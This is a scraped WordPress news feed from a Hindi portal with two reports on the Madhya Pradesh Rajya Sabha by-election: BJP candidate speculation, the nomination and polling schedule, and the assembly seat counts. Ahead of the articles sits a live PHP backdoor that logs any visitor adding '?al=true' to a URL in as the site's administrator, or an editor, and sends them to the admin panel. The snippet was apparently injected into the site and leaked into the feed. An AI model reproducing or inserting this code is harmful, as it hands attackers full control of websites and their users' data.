// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Rajya Sabha seat – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 18 Aug 2024 09:10:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 BJP का राज्यसभा उम्मीदवार चौंकाने वाला होगा, टिकट की आस में बैठे दिग्गज रह जाएंगे खाली हाथ? https://pratyushaashakinayikiran.com/?p=61589 Sun, 18 Aug 2024 09:10:00 +0000 https://pratyushaashakinayikiran.com/?p=61589 भोपाल

राज्यसभा सदस्य के चुनाव के लिए नामांकन प्रक्रिया शुरू हो चुकी है. मध्य प्रदेश से खाली एक राज्यसभा सीट पर भी चुनाव होना है, जिसे लेकर सियासी गलियारों में हलचल तेज हो गई है. राज्यसभा सीट पर बीजेपी किसे उम्मीदवार बनाएगी इसपर अभी तक संशय बना हुआ है.  उम्मीदवारों को लेकर कई नाम सामने आए हैं, लेकिन माना जा रहा है कि बीजेपी किसी चौंकाने वाले उम्मीदवार के नाम पर मुहर लगा सकती है.

कब है चुनाव?

राज्यसभा चुनाव के लिए नामांकन प्रक्रिया 21 अगस्त तक चलने वाली है. इसके बाद 22 अगस्त को नाम निर्देशन पत्रों की स्क्रूटनी की जाएगी. इसके साथ ही 26 अगस्त तक नामांकन वापस ले सकते हैं. वहीं मतदान 3 सितंबर को सुबह 9 से शाम 4 बजे तक होगा. मतगणना एवं परिणाम की घोषणा भी 3 सितंबर को ही की जाएगी.

दावेदारों की लिस्ट में ये नाम आगे

मध्य प्रदेश की राज्यसभा सीट पर बीजेपी की तरफ से कई दावेदार कतार में हैं. पूर्व गृह मंत्री नरोत्तम मिश्रा से लेकर गुना से पूर्व सांसद केपी यादव, जयभान सिंह पवैया भी दावेदारों की सूची में हैं. इसके अलावा सुरेश पचौरी, कांतदेव सिंह, माधवी लता और मुकेश चतुर्वेदी के नाम की भी चर्चा है. चर्चा ये भी है कि कांग्रेस से आए किसी नेता को भी टिकट दिया जा सकता है. लेकिन बीजेपी आलाकमान जिस तरह के निर्णय लेते आया है, उससे ऐसा भी अनुमान लगाया जा रहा है कि इन सबसे हटकर बीजेपी किसी चौंकाने वाले प्रत्याशी के नाम का ऐलान बीजेपी कर सकती है. अगर ऐसा हुआ तो लंबे समय से टिकट की आस में बैठे बीजेपी दिग्गजों को झटका लग सकता है.

चौंकाने वाला होगा राज्यसभा उम्मीदवार?

माना यह जा रहा है कि बीजेपी अब किसी और बड़े और वरिष्ठ चेहरे को राज्यसभा भेज सकती है.खबर है कि इस बार बीजेपी मध्य प्रदेश में कोई एक्सपेरिमेंट कर सकती है यानी कि मध्य प्रदेश से बाहर का कोई नेता लाकर मध्य प्रदेश के कोटे से राज्यसभा भेजा जा सकता है, हालांकि देखने वाली बात होगी कि आखिर बीजेपी किसे राज्यसभा भेजेगी लेकिन फिलहाल माना तो यही जा रहा है कि बीजेपी में अंतर्कलह बढ़ने के चलते बीजेपी किसी एक नाम के निष्कर्ष पर नहीं पहुंच पा रही है.

]]>
मप्र में राज्य सभा की एक सीट के लिए 3 सिंतबर को उपचुनाव, 21 अगस्त तक नामांकन पत्र जमा किए जा सकेंगे https://pratyushaashakinayikiran.com/?p=58274 Wed, 07 Aug 2024 20:42:00 +0000 https://pratyushaashakinayikiran.com/?p=58274 भोपाल
मध्य प्रदेश में राज्य सभा की एक रिक्त सीट के लिए उपचुनाव तीन सितंबर को होगा। यह सीट ज्योतिरादित्य सिंधिया के लोकसभा का सदस्य निर्वाचित होने के बाद त्यागपत्र देने के कारण रिक्त हुई थी। चुनाव आयोग ने बुधवार को राज्य सभा की रिक्त सीटों के लिए उपचुनाव का कार्यक्रम घोषित कर दिया है।

ज्योतिरादित्य सिंधिया का इस्तीफा
भारतीय जनता पार्टी ने ज्योतिरादित्य सिंधिया को राज्य सभा का सदस्य होते हुए चुनाव लड़ाया था। 11 जून को उन्होंने राज्य सभा की सदस्यता से त्यागपत्र दिया, जिसके बाद यह सीट रिक्त घोषित की गई। आयोग ने मध्य प्रदेश के साथ अन्य राज्यों से रिक्त राज्य सभा के स्थान भरने के लिए चुनाव कार्यक्रम घोषित किया है।
 
चुनाव कार्यक्रम
इसके अनुसार 14 अगस्त को चुनाव की अधिसूचना जारी होगी। 21 अगस्त तक नामांकन पत्र जमा किए जा सकेंगे। 22 अगस्त को इनकी जांच होगी और 26 अगस्त तक नाम वापस लिए जा सकेंगे। आवश्यकता पड़ी तो मतदान तीन सितंबर को सुबह नौ से चार बजे तक कराया जाएगा। पांच बजे से मतगणना होगी।

भाजपा का सदस्य चुना जाना तय
230 सदस्यीय मध्य प्रदेश विधानसभा में भाजपा का पूर्ण बहुमत है। पार्टी के सदस्यों की संख्या 163 है। जबकि, कांग्रेस के सदस्यों की संख्या 64 है। एक विधायक आदिवासी का पार्टी से हैं। जबकि, दो स्थान शिवराज सिंह चौहान और रामनिवास रावत के त्यागपत्र देने के कारण रिक्त हैं। इस हिसाब से भाजपा द्वारा तय प्रत्याशी की जीत सुनिश्चित है।

]]>